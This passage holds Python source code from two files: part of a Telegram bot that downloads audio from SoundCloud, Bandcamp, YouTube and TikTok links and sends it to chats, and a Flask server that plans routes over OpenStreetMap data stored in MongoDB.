in entities.values(): event_name = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "") break log_and_track(event_name, update.message) chat_id = update.message.chat_id chat_type = update.message.chat.type reply_to_message_id = update.message.message_id flood = self.chat_storage[str(chat_id)]["settings"]["flood"] if chat_type != Chat.PRIVATE and flood == "no": self.rant_and_cleanup(context.bot, chat_id, self.RANT_TEXT_PUBLIC, reply_to_message_id=reply_to_message_id) else: context.bot.send_message(chat_id=chat_id, text=self.HELP_TEXT, parse_mode='Markdown', disable_web_page_preview=True) def get_wait_text(self): return random.choice(self.WAIT_BIT_TEXT) def get_settings_inline_keyboard(self, chat_id): mode = self.chat_storage[str(chat_id)]["settings"]["mode"] flood = self.chat_storage[str(chat_id)]["settings"]["flood"] emoji_yes = "✅" emoji_no = "❌" button_dl = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "dl" else emoji_no, "Download"]), callback_data=" ".join(["settings", "dl"])) button_link = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "link" else emoji_no, "Links"]), callback_data=" ".join(["settings", "link"])) button_ask = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "ask" else emoji_no, "Ask"]), callback_data=" ".join(["settings", "ask"])) button_flood = InlineKeyboardButton(text=" ".join([emoji_yes if flood == "yes" else emoji_no, "Captions"]), callback_data=" ".join(["settings", "flood"])) button_close = InlineKeyboardButton(text=" ".join([emoji_no, "Close settings"]), callback_data=" ".join(["settings", "close"])) inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_ask], [button_flood, button_close]]) return inline_keyboard def settings_command_callback(self, update: Update, context: CallbackContext): self.init_chat(update.message) log_and_track("settings") chat_id = update.message.chat_id context.bot.send_message(chat_id=chat_id, parse_mode='Markdown', reply_markup=self.get_settings_inline_keyboard(chat_id), text=self.SETTINGS_TEXT) def common_command_callback(self, update: Update, context: CallbackContext): self.init_chat(update.message) chat_id = update.message.chat_id chat_type = update.message.chat.type reply_to_message_id = update.message.message_id command_entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND]) if not command_entities: command_passed = False # if no command then it is just a message and use default mode mode = self.chat_storage[str(chat_id)]["settings"]["mode"] else: command_passed = True # try to determine mode from command mode = None for entity_value in command_entities.values(): mode = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "") break if not mode: mode = "dl" if command_passed and not context.args: rant_text = self.RANT_TEXT_PRIVATE if chat_type == Chat.PRIVATE else self.RANT_TEXT_PUBLIC rant_text += "\nYou can simply send message with links (to download) OR command as `/{} <links>`.".format( mode) self.rant_and_cleanup(context.bot, chat_id, rant_text, reply_to_message_id=reply_to_message_id) return # apologize and send TYPING: always in PM and only when it's command in non-PM apologize = chat_type == Chat.PRIVATE or command_passed if apologize: context.bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING) source_ip = None proxy = None if self.source_ips: source_ip = random.choice(self.source_ips) if self.proxies: proxy = random.choice(self.proxies) # TODO find working IP? urls = self.prepare_urls(msg_or_text=update.message, direct_urls=(mode == "link"), source_ip=source_ip, proxy=proxy) logger.debug(urls) if not urls: if apologize: context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.NO_URLS_TEXT, parse_mode='Markdown') else: event_name = ("{}_cmd".format(mode)) if command_passed else ("{}_msg".format(mode)) log_and_track(event_name, update.message) if mode == "dl": wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, parse_mode='Markdown', text=get_italic(self.get_wait_text())) for url in urls: self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id, reply_to_message_id=reply_to_message_id, wait_message_id=wait_message.message_id, source_ip=source_ip, proxy=proxy) elif mode == "link": wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, parse_mode='Markdown', text=get_italic(self.get_wait_text())) link_text = get_link_text(urls) context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, parse_mode='Markdown', disable_web_page_preview=True, text=link_text if link_text else self.NO_URLS_TEXT) context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id) elif mode == "ask": # ask: always in PM and only if good urls exist in non-PM if chat_type == Chat.PRIVATE or "http" in " ".join(urls.values()): orig_msg_id = str(reply_to_message_id) self.chat_storage[str(chat_id)][orig_msg_id] = {"message": update.message, "urls": urls, "source_ip": source_ip, "proxy": proxy} question = "🎶 links found, what to do?" button_dl = InlineKeyboardButton(text="✅ Download", callback_data=" ".join([orig_msg_id, "dl"])) button_link = InlineKeyboardButton(text="❇️ Links", callback_data=" ".join([orig_msg_id, "link"])) button_cancel = InlineKeyboardButton(text="❎", callback_data=" ".join([orig_msg_id, "nodl"])) inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_cancel]]) context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, reply_markup=inline_keyboard, text=question) self.cleanup_chat(chat_id) def button_query_callback(self, update: Update, context: CallbackContext): btn_msg = update.callback_query.message self.init_chat(btn_msg) user_id = update.callback_query.from_user.id btn_msg_id = btn_msg.message_id chat = btn_msg.chat chat_id = chat.id chat_type = chat.type orig_msg_id, action = update.callback_query.data.split() if orig_msg_id == "settings": if chat_type != Chat.PRIVATE: chat_member_status = chat.get_member(user_id).status if chat_member_status not in [ChatMember.ADMINISTRATOR, ChatMember.CREATOR] and user_id not in self.ALERT_CHAT_IDS: log_and_track("settings_fail") update.callback_query.answer(text="You're not chat admin") return log_and_track("settings_{}".format(action), btn_msg) if action == "close": context.bot.delete_message(chat_id, btn_msg_id) else: setting_changed = False if action in ["dl", "link", "ask"]: current_setting = self.chat_storage[str(chat_id)]["settings"]["mode"] if action != current_setting: setting_changed = True self.chat_storage[str(chat_id)]["settings"]["mode"] = action elif action in ["flood"]: current_setting = self.chat_storage[str(chat_id)]["settings"]["flood"] setting_changed = True self.chat_storage[str(chat_id)]["settings"][action] = "no" if current_setting == "yes" else "yes" if setting_changed: self.chat_storage.sync() update.callback_query.answer(text="Settings changed") update.callback_query.edit_message_reply_markup(parse_mode='Markdown', reply_markup=self.get_settings_inline_keyboard( chat_id)) else: update.callback_query.answer(text="Settings not changed") elif orig_msg_id in self.chat_storage[str(chat_id)]: msg_from_storage = self.chat_storage[str(chat_id)].pop(orig_msg_id) orig_msg = msg_from_storage["message"] urls = msg_from_storage["urls"] source_ip = msg_from_storage["source_ip"] proxy = msg_from_storage["proxy"] log_and_track("{}_msg".format(action), orig_msg) if action == "dl": update.callback_query.answer(text=self.get_wait_text()) wait_message = update.callback_query.edit_message_text(parse_mode='Markdown', text=get_italic(self.get_wait_text())) for url in urls: self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id, reply_to_message_id=orig_msg_id, wait_message_id=wait_message.message_id, source_ip=source_ip, proxy=proxy) elif action == "link": update.callback_query.answer(text=self.get_wait_text()) wait_message = update.callback_query.edit_message_text(parse_mode='Markdown', text=get_italic(self.get_wait_text())) urls = self.prepare_urls(urls.keys(), direct_urls=True, source_ip=source_ip, proxy=proxy) link_text = get_link_text(urls) context.bot.send_message(chat_id=chat_id, reply_to_message_id=orig_msg_id, parse_mode='Markdown', disable_web_page_preview=True, text=link_text if link_text else self.NO_URLS_TEXT) context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id) elif action == "nodl": context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id) else: update.callback_query.answer(text=self.OLG_MSG_TEXT) context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id) def inline_query_callback(self, update: Update, context: CallbackContext): log_and_track("link_inline") inline_query_id = update.inline_query.id text = update.inline_query.query results = [] urls = self.prepare_urls(msg_or_text=text, direct_urls=True) for url in urls: for direct_url in urls[url].splitlines(): # TODO: fix non-mp3 and allow only sc/bc logger.debug(direct_url) results.append( InlineQueryResultAudio(id=str(uuid4()), audio_url=direct_url, title="FAST_INLINE_DOWNLOAD")) try: context.bot.answer_inline_query(inline_query_id, results) except: pass def prepare_urls(self, msg_or_text, direct_urls=False, source_ip=None, proxy=None): if isinstance(msg_or_text, Message): urls = [] url_entities = msg_or_text.parse_entities(types=[MessageEntity.URL]) url_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.URL]) url_entities.update(url_caption_entities) for entity in url_entities: url_str = url_entities[entity] logger.debug("Entity URL Parsed: %s", url_str) if "://" not in url_str: url_str = "http://{}".format(url_str) urls.append(URL(url_str)) text_link_entities = msg_or_text.parse_entities(types=[MessageEntity.TEXT_LINK]) text_link_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.TEXT_LINK]) text_link_entities.update(text_link_caption_entities) for entity in text_link_entities: url_str = entity.url logger.debug("Entity Text Link Parsed: %s", url_str) urls.append(URL(url_str)) else: urls = find_all_links(msg_or_text, default_scheme="http") urls_dict = {} for url_item in urls: url = url_item # unshorten soundcloud.app.goo.gl and other links, but not tiktok: if "tiktok" not in url_item.host: try: url = URL(requests.head(url_item, allow_redirects=True).url) except: pass url_text = url.to_text(True) #FIXME crutch: url_text = url_text.replace("m.soundcloud.com", "soundcloud.com") url_parts_num = len([part for part in url.path_parts if part]) try: if ( # SoundCloud: tracks, sets and widget pages, no /you/ pages #TODO private sets are 5 (self.SITES["sc"] in url.host and (2 <= url_parts_num <= 4 or self.SITES["scapi"] in url_text) and ( not "you" in url.path_parts)) or # Bandcamp: tracks and albums (self.SITES["bc"] in url.host and (2 <= url_parts_num <= 2)) or # YouTube: videos and playlists (self.SITES["yt"] in url.host and ( "youtu.be" in url.host or "watch" in url.path or "playlist" in url.path)) ): if direct_urls or self.SITES["yt"] in url.host: urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE, source_ip, proxy) else: urls_dict[url_text] = "http" elif not any((site in url.host for site in self.SITES.values())): urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE, source_ip, proxy) except ProcessExecutionError: logger.debug("youtube-dl get-url failed: %s", url_text) except URLError as exc: urls_dict[url_text] = exc.status return urls_dict @REQUEST_TIME.time() @run_async def download_url_and_send(self, bot, url, direct_urls, chat_id, reply_to_message_id=None, wait_message_id=None, source_ip=None, proxy=None): bot.send_chat_action(chat_id=chat_id, action=ChatAction.RECORD_AUDIO) download_dir = os.path.join(self.DL_DIR, str(uuid4())) shutil.rmtree(download_dir, ignore_errors=True) os.makedirs(download_dir) status = 0 if direct_urls == "direct": status = -3 elif direct_urls == "country": status = -4 elif direct_urls == "live": status = -5 elif direct_urls == "timeout": status = -6 else: if (self.SITES["sc"] in url and self.SITES["scapi"] not in url) or (self.SITES["bc"] in url): cmd_name = "scdl" cmd_args = [] cmd = None cmd_input = None if self.SITES["sc"] in url and self.SITES["scapi"] not in url: cmd = scdl_bin cmd_name = str(cmd) cmd_args = ( "-l", url, # URL of track/playlist/user "-c", # Continue if a music already exist "--path", download_dir, # Download the music to a custom path "--onlymp3", # Download only the mp3 file even if the track is Downloadable "--addtofile", # Add the artist name to the filename if it isn't in the filename already "--addtimestamp", # Adds the timestamp of the creation of the track to the title (useful to sort chronologically) "--no-playlist-folder", # Download playlist tracks into directory, instead of making a playlist subfolder "--extract-artist", # Set artist tag from title instead of username ) cmd_input = None elif self.SITES["bc"] in url: cmd = bandcamp_dl_bin cmd_name = str(cmd) cmd_args = ( "--base-dir", download_dir, # Base location of which all files are downloaded "--template", "%{track} - %{artist} - %{title} [%{album}]", # Output filename template "--overwrite", # Overwrite tracks that already exist "--group", # Use album/track Label as iTunes grouping "--embed-art", # Embed album art (if available) "--no-slugify", # Disable slugification of track, album, and artist names url, # URL of album/track ) cmd_input = "yes" logger.info("%s starts: %s", cmd_name, url) cmd_proc = cmd[cmd_args].popen(stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True) try: cmd_stdout, cmd_stderr = cmd_proc.communicate(input=cmd_input, timeout=self.DL_TIMEOUT) cmd_retcode = cmd_proc.returncode # TODO listed are common scdl problems for one track with 0 retcode, all its output is always in stderr: if cmd_retcode or (any(err in cmd_stderr for err in ["Error resolving url", "is not streamable", "Failed to get item"]) and ".mp3" not in cmd_stderr): raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr) logger.info("%s succeeded: %s", cmd_name, url) status = 1 except TimeoutExpired: cmd_proc.kill() logger.info("%s took too much time and dropped: %s", cmd_name, url) status = -1 except ProcessExecutionError: logger.exception("%s failed: %s", cmd_name, url) if status == 0: cmd = youtube_dl_func cmd_name = "youtube_dl_func" # TODO: set different ydl_opts for different sites ydl_opts = { 'format': 'bestaudio/best', 'outtmpl': os.path.join(download_dir, '%(title)s.%(ext)s'), # default: %(autonumber)s - %(title)s-%(id)s.%(ext)s 'postprocessors': [ { 'key': 'FFmpegExtractAudio', 'preferredcodec': 'mp3', 'preferredquality': '128', }, # {'key': 'EmbedThumbnail',}, {'key': 'FFmpegMetadata',}, ], } host = urlparse(url).hostname if host == "tiktok.com" or host.endswith(".tiktok.com"): ydl_opts['postprocessors'] = [] ydl_opts['outtmpl'] = os.path.join(download_dir, 'tiktok.%(ext)s') if proxy: ydl_opts['proxy'] = proxy if source_ip: ydl_opts['source_address'] = source_ip # https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/YoutubeDL.py#L210 if self.cookies_file: if "http" in self.cookies_file: ydl_opts['cookiefile'] = self.COOKIES_DOWNLOAD_FILE else: ydl_opts['cookiefile'] = self.cookies_file queue = Queue() cmd_args = (url, ydl_opts, queue,) logger.info("%s starts: %s", cmd_name, url) cmd_proc = Process(target=cmd, args=cmd_args) cmd_proc.start() try: cmd_retcode, cmd_stderr = queue.get(block=True, timeout=self.DL_TIMEOUT) cmd_stdout = "" cmd_proc.join() if cmd_retcode: raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr) # raise cmd_status #TODO: pass and re-raise original Exception? logger.info("%s succeeded: %s", cmd_name, url) status = 1 except Empty: cmd_proc.join(1) if cmd_proc.is_alive(): cmd_proc.terminate() logger.info("%s took too much time and dropped: %s", cmd_name, url) status = -1 except ProcessExecutionError: logger.exception("%s failed: %s", cmd_name, url) status = -2 gc.collect() if status in [-1, -6]: bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.DL_TIMEOUT_TEXT, parse_mode='Markdown') elif status == -2: bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.NO_AUDIO_TEXT, parse_mode='Markdown') elif status == -3: bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.DIRECT_RESTRICTION_TEXT, parse_mode='Markdown') elif status == -4: bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.REGION_RESTRICTION_TEXT, parse_mode='Markdown') elif status == -5: bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.LIVE_RESTRICTION_TEXT, parse_mode='Markdown') elif status == 1: file_list = [] for d, dirs, files in os.walk(download_dir): for file in files: file_list.append(os.path.join(d, file)) if not file_list: logger.info("No files in dir: %s", download_dir) bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, I couldn't download any files from provided links", parse_mode='Markdown') else: for file in sorted(file_list): file_name = os.path.split(file)[-1] file_parts = [] try: file_parts = self.convert_and_split_audio_file(file) except FileNotSupportedError as exc: if not (exc.file_format in ["m3u", "jpg", "jpeg", "png", "finished", "tmp"]): logger.warning("Unsupported file format: %s", file_name) bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, downloaded file `{}` is in format I could not yet convert or send".format( file_name), parse_mode='Markdown') except FileTooLargeError as exc: logger.info("Large file for convert: %s", file_name) bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, downloaded file `{}` is `{}` MB and it is larger than I could convert (`{} MB`)".format( file_name, exc.file_size // 1000000, self.MAX_CONVERT_FILE_SIZE // 1000000), parse_mode='Markdown') except FileSplittedPartiallyError as exc: file_parts = exc.file_parts logger.exception("Splitting failed: %s", file_name) bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, not enough memory to convert file `{}`..".format( file_name), parse_mode='Markdown') except FileNotConvertedError as exc: logger.exception("Splitting failed: %s", file_name) bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, not enough memory to convert file `{}`..".format( file_name), parse_mode='Markdown') try: caption = None flood = self.chat_storage[str(chat_id)]["settings"]["flood"] if flood == "yes": addition = "" url_obj = URL(url) if self.SITES["yt"] in url_obj.host: source = "YouTube" file_root, file_ext = os.path.splitext(file_name) file_title = file_root.replace(file_ext, "") addition = ": " + file_title elif self.SITES["sc"] in url_obj.host: source = "SoundCloud" elif self.SITES["bc"] in url_obj.host: source = "Bandcamp" else: source = url_obj.host.replace(".com", "").replace("www.", "").replace("m.", "") # if "youtu.be" in url_obj.host: # url = url.replace("http://", "").replace("https://", "") # else: # url = shorten_url(url) caption = "@{} _got it from_ [{}]({}){}".format(self.bot_username.replace("_", "\_"), source, url, addition.replace("_", "\_")) # logger.info(caption) sent_audio_ids = self.send_audio_file_parts(bot, chat_id, file_parts, reply_to_message_id if flood == "yes" else None, caption) except FileSentPartiallyError as exc: sent_audio_ids = exc.sent_audio_ids bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, could not send file `{}` or some of it's parts..".format( file_name), parse_mode='Markdown') logger.warning("Sending some parts failed: %s", file_name) if not self.SERVE_AUDIO: shutil.rmtree(download_dir, ignore_errors=True) if wait_message_id: # TODO: delete only once try: bot.delete_message(chat_id=chat_id, message_id=wait_message_id) except: pass def convert_and_split_audio_file(self, file=""): file_root, file_ext = os.path.splitext(file) file_format = file_ext.replace(".", "").lower() file_size = os.path.getsize(file) # FIXME unknown_video is for tiktok if file_format not in ["mp3", "m4a", "mp4", "unknown_video"]: raise FileNotSupportedError(file_format) if file_size > self.MAX_CONVERT_FILE_SIZE: raise FileTooLargeError(file_size) # FIXME unknown_video is for tiktok and also tiktok.mp4 if file_format not in ["mp3", "unknown_video"] and "tiktok." not in file: logger.info("Converting: %s", file) try: file_converted = file.replace(file_ext, ".mp3") ffinput = ffmpeg.input(file) ffmpeg.output(ffinput, file_converted, audio_bitrate="128k", vn=None).run() file = file_converted file_root, file_ext = os.path.splitext(file) file_format = file_ext.replace(".", "").lower() file_size = os.path.getsize(file) except Exception: # TODO exceptions raise FileNotConvertedError file_parts = [] if file_size <= self.MAX_TG_FILE_SIZE: file_parts.append(file) else: logger.info("Splitting: %s", file) id3 = None try: id3 = ID3(file, translate=False) except: pass parts_number = file_size // self.MAX_TG_FILE_SIZE + 1 # https://github.com/c0decracker/video-splitter # https://superuser.com/a/1354956/464797 try: # file_duration = float(ffmpeg.probe(file)['format']['duration']) part_size = file_size // parts_number cur_position = 0 for i in range(parts_number): file_part = file.replace(file_ext, ".part{}{}".format(str(i + 1), file_ext)) ffinput = ffmpeg.input(file) if i == (parts_number - 1): ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position).run() else: ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position, fs=part_size).run() part_duration = float(ffmpeg.probe(file_part)['format']['duration']) cur_position += part_duration if id3: try: id3.save(file_part, v1=2, v2_version=4) except: pass file_parts.append(file_part) except Exception: # TODO exceptions raise FileSplittedPartiallyError(file_parts) return file_parts def send_audio_file_parts(self, bot, chat_id, file_parts, reply_to_message_id=None, caption=None): sent_audio_ids = [] for index, file_part in enumerate(file_parts): path = pathlib.Path(file_part) file_name = os.path.split(file_part)[-1] # file_name = translit(file_name, 'ru', reversed=True) logger.info("Sending: %s", file_name) bot.send_chat_action(chat_id=chat_id, action=ChatAction.UPLOAD_AUDIO) caption_part = None if len(file_parts) > 1: caption_part = "Part {} of {}".format(str(index + 1), str(len(file_parts))) if caption: if caption_part: caption_full = caption_part + " | " + caption else: caption_full = caption else: if caption_part: caption_full = caption_part else: caption_full = "" # caption_full = textwrap.shorten(caption_full, width=190, placeholder="..") for i in range(3): try: if file_part.endswith('.mp3'): mp3 = MP3(file_part) duration = round(mp3.info.length) performer = None title = None try: performer = ", ".join(mp3['artist']) title = ", ".join(mp3['title']) except: pass if "127.0.0.1" in self.TG_BOT_API: audio = path.absolute().as_uri() logger.debug(audio) elif self.SERVE_AUDIO: audio = str(urljoin(self.APP_URL, str(path.relative_to(self.DL_DIR)))) logger.debug(audio) else: audio = open(file_part, 'rb') if i > 0: # maybe: Reply message not found reply_to_message_id = None audio_msg = bot.send_audio(chat_id=chat_id, reply_to_message_id=reply_to_message_id, audio=audio, duration=duration, performer=performer, title=title, caption=caption_full, parse_mode='Markdown') sent_audio_ids.append(audio_msg.audio.file_id) logger.info("Sending succeeded: %s", file_name) break # FIXME unknown_video is for tiktok elif file_part.endswith('.unknown_video') or "tiktok." in file_part: video = open(file_part, 'rb') video_msg = bot.send_video(chat_id=chat_id, reply_to_message_id=reply_to_message_id, video=video, # duration=duration, caption=caption_full, parse_mode='Markdown') sent_audio_ids.append(video_msg.video.file_id) logger.info("Sending succeeded: %s", file_name) break except TelegramError: if i == 2: logger.exception("Sending failed because of TelegramError: %s", file_name) if len(sent_audio_ids) != len(file_parts): raise FileSentPartiallyError(sent_audio_ids) return sent_audio_ids
server.py
import datetime import json import os import requests import random import threading import logging from flask import Flask from flask import request from pymongo import MongoClient from routing import configuration from routing import graph from routing import osm_handler from routing.utils import bring_closer mongo_client = MongoClient() db_client = mongo_client['osm'] map_graph = graph.Graph(db_client) handler = osm_handler.OsmHandler(db_client) config = configuration.Configuration() logging.basicConfig(filename="server.log", level=logging.INFO) app = Flask(__name__) import string import random def id_generator(size=10, chars=string.ascii_uppercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) def process_back_search(id): map_graph.background_search() info = config.get_tmp_by_key(id) info['data'] = {'isEnd': True} config.set_tmp_by_key(id, info) logging.info('Server. Back_search has finished.') def process_backup_create(id): handler.create_backup(config.get_bounds()) config.set_backup_info({ 'exist': True, 'path': '../settings/backup.json', 'date': datetime.datetime.today().strftime("%d.%m.%Y %H:%M") }) config.save_config() info = config.get_tmp_by_key(id) info['data'] = config.get_backup_info() config.set_tmp_by_key(id, info) logging.info('Server. Backup_create has finished.') def process_backup_load(path, id): bounds = handler.load_backup(path) config.set_bounds(bounds) config.save_config() info = config.get_tmp_by_key(id) info['data'] = config.get_backup_info() config.set_tmp_by_key(id, info) logging.info('Server. Backup_load has finished.') def process_map(str_req, id): r = requests.get(str_req, stream=True) if r.status_code == 200: with open(os.path.join('..', 'settings', 'tmp.osm'), 'wb') as f: for chunk in r.iter_content(1024): f.write(chunk) bounds = handler.parse(open(os.path.join('..', 'settings', 'tmp.osm'), 'r', encoding='utf8')) if os.path.isfile(os.path.join('..', 'settings', 'tmp.osm')): os.remove(os.path.join('..', 'settings', 'tmp.osm')) if bounds not in config.get_bounds(): config.add_bounds(bounds) config.save_config() info = config.get_tmp_by_key(id) info['data'] = {'bounds': bounds} config.set_tmp_by_key(id, info) logging.info('Server. Process_map has finished.') else: logging.error('Server.Process_map: Ошибка скачивания карты.') @app.route("/api/0.5/fullroute") # /api/0.5/fullroute?lat1=1.1&lon1=1.2&lat2=2.1&lon2=2.2 def route(): try: lat1 = float(request.args.get('lat1')) lon1 = float(request.args.get('lon1')) lat2 = float(request.args.get('lat2')) lon2 = float(request.args.get('lon2')) except: logging.error("Server.fullroute: Неверные аргументы запроса") return json.dumps( { 'error': True, 'data': {}, 'msg': "Error in args" }) try: node1 = map_graph.find_nearest([lat1, lon1]) node2 = map_graph.find_nearest([lat2, lon2]) logging.info(f'Routing {node1}, {node2}') right = map_graph.astar(node1, node2) path_right = [] time_right = 0 length_right = 0 if right: path_right = right['path'] time_right = right['dist'] for i, node in enumerate(path_right): if i == len(path_right) - 1: break length_right = length_right + map_graph.distance_between(node, path_right[i + 1]) path_right = map_graph.clarify_path_to_loc(path_right) if path_right else [] if path_right: if len(path_right) > 1: start = bring_closer({'loc': [lat1, lon1], 'nodes': [[a['lat'], a['lon']] for a in path_right[0:2]]}) middle = path_right[1:len(path_right) - 1] end = bring_closer({'loc': [lat2, lon2], 'nodes': [[a['lat'], a['lon']] for a in path_right[len(path_right) - 1:len(path_right) - 3:-1]]}) end.reverse() else: start = {'lat': lat1, 'lon': lon1} middle = path_right end = {'lat': lat2, 'lon': lon2} path_right = start + middle + end left = map_graph.astar(node1, node2, nodes_client_for_left=map_graph.db_client.nodes) path_left = [] time_left = 0 length_left = 0 if left: path_left = left['path'] time_left = left['dist'] for i, node in enumerate(path_left): if i == len(path_left) - 1: break length_left = length_left + map_graph.distance_between(node, path_left[i + 1]) path_left = map_graph.clarify_path_to_loc(path_left) if path_left else [] if path_left: if len(path_left) > 1: start = bring_closer({'loc': [lat1, lon1], 'nodes': [[a['lat'], a['lon']] for a in path_left[0:2]]}) middle = path_left[1:len(path_left) - 1] end = bring_closer({'loc': [lat2, lon2], 'nodes': [[a['lat'], a['lon']] for a in path_left[len(path_left) - 1:len(path_left) - 3:-1]]}) end.reverse() else: start = {'lat': lat1, 'lon': lon1} middle = path_left end = {'lat': lat2, 'lon': lon2} path_left = start + middle + end except ValueError as e: return json.dumps({'error': True, 'data': {}, 'msg': str(e)}) logging.info(f"""Send this: {{ 'error': False, 'data': {{ 'from': {{'lat': {lat1}, 'lon': {lon1}}}, 'to': {{'lat': {lat2}, 'lon': {lon2}}}, 'path_right': {path_right}, 'distance_right': {length_right}, 'time_right': {time_right}, 'path_left':{path_left}, 'distance_left': {length_left}, 'time_left': {time_left} }}, 'msg': "Full routing" }} """) return json.dumps( { 'error': False, 'data': { 'from': {'lat': lat1, 'lon': lon1}, 'to': {'lat': lat2, 'lon': lon2}, 'path_right': path_right, 'distance_right': length_right, 'time_right': time_right, 'path_left': path_left, 'distance_left': length_left, 'time_left': time_left }, 'msg': "Full routing" }) @app.route("/api/0.5/route_id") # /api/0.5/route_id?id1=11&id2=22 def route_id(): try: id1 = int(request.args.get('id1')) id2 = int(request.args.get('id2')) except: return json.dumps({'error': True, 'data': {}, 'msg': "Error in args"}) try: path = map_graph.astar(id1, id2) except ValueError as e: return json.dumps({'error': True, 'data': {}, 'msg': str(e)}) path = list(path) if path else [] return json.dumps( { 'error': False, 'data': {'path': path}, 'msg': "Routing by id" }) @app.route("/api/0.5/fullroute_id") # /api/0.5/fullroute_id?id1=11&id2=22 def fullroute_id(): try: id1 = int(request.args.get('id1')) id2 = int(request.args.get('id2')) except: logging.error("Server.fullroute_id: Неверные аргументы запроса") return json.dumps({'error': True, 'data': {}, 'msg': "Error in args"}) try: path = map_graph.astar(id1, id2) except ValueError as e: return json.dumps({'error': True, 'data': {}, 'msg': str(e)}) path = map_graph.clarify_path_to_loc(path) if path else [] return json.dumps( { 'error': False, 'data': {'path': path}, 'msg': "Full routing by id" }) @app.route("/api/0.5/create_backup") def create_backup(): id = id_generator() thread = threading.Thread(target=process_backup_create, args=(id,)) config.add_tmp(id, {'thread': thread}) thread.start() logging.info("Server.create_backup: Создание backup'a...") return json.dumps( { 'error': False, 'data': {'id': id}, 'msg': "Backup is starting" }) @app.route("/api/0.5/load_backup") def load_backup(): info = config.get_backup_info() if info['exist']: id = id_generator() thread = threading.Thread(target=process_backup_load, args=(info['path'],id)) config.add_tmp(id, {'thread': thread}) thread.start() logging.info("Server.load_backup: Загрузка backup'a...") return json.dumps( { 'error': False, 'data': {'id': id}, 'msg': "Backup is loading" }) logging.info('Server.load_backup: Backup отсутствует') return json.dumps( { 'error': True, 'data': {}, 'msg': "Backup doesn't exist" }) @app.route("/api/0.5/load_map") # /api/0.5/load_map?min_lat=1.1&min_lon=1.2&max_lat=2.1&max_lon=2.2 def load_map(): try: min_lat = float(request.args.get('min_lat')) min_lon = float(request.args.get('min_lon')) max_lat = float(request.args.get('max_lat')) max_lon = float(request.args.get('max_lon')) except: logging.error("Server.load_map: Неверные аргументы запроса") return json.dumps({'error': True, 'data': {}, 'msg': "Error in args"}) str_req = 'https://overpass-api.de/api/map?bbox=' + str(min_lon) + ',' + str(min_lat) + ',' + str(max_lon) + ',' + str(max_lat) id = id_generator() thread = threading.Thread(target=process_map, args=(str_req,id)) config.add_tmp(id, {'thread': thread}) thread.start() logging.info('Server.load_map: Скачивание карты началось.') return json.dumps( { 'error': False, 'data': {'id': id}, 'msg': "Downloading has been started" }) @app.route("/api/0.5/bounds") def get_bounds(): logging.info(f"""Send this: {{ 'error': False, 'data': {{'bounds': {config.get_bounds()}}}, 'msg': "Map's bounds" }} """) return json.dumps( { 'error': False, 'data': {'bounds': config.get_bounds()}, 'msg': "Map's bounds" }) @app.route("/api/0.5/back_search") def back_search(): logging.warning('Server. Фоновый поиск запущен.') id = id_generator() thread = threading.Thread(target=process_back_search, args=(id,)) config.add_tmp(id, {'thread': thread}) thread.start() return json.dumps({ 'error': False, 'data': {'id': id}, 'msg': "Searching has been started" }) @app.route("/api/0.5/check") # /api/0.5/check?id=string def check(): try: id = request.args.get('id') except: logging.error("Server.check: Неверные аргументы запроса") return json.dumps({'error': True, 'data': {}, 'msg': "Error in args" }) info = config.get_tmp_by_key(id) if not info: # если поток не отслеживается return json.dumps({ 'error': True, 'data': {'run': False, 'data': {}}, 'msg': "Thread is not monitored." }) if info['thread'].isAlive(): # если поток ещё запущен return json.dumps({ 'error': False, 'data': {'run': True, 'data': {}}, 'msg': "Thread is still running" }) else: if 'data' in info: # поток завершился, данные существуют config.del_tmp(id) return json.dumps({ 'error': False, 'data': {'run': False, 'data': info['data']}, 'msg': "Thread has finished" }) else: # поток завершился, данные не существуют config.del_tmp(id) return json.dumps({ 'error': True, 'data': {'run': False, 'data': {}}, 'msg': "Smth was wrong" }) 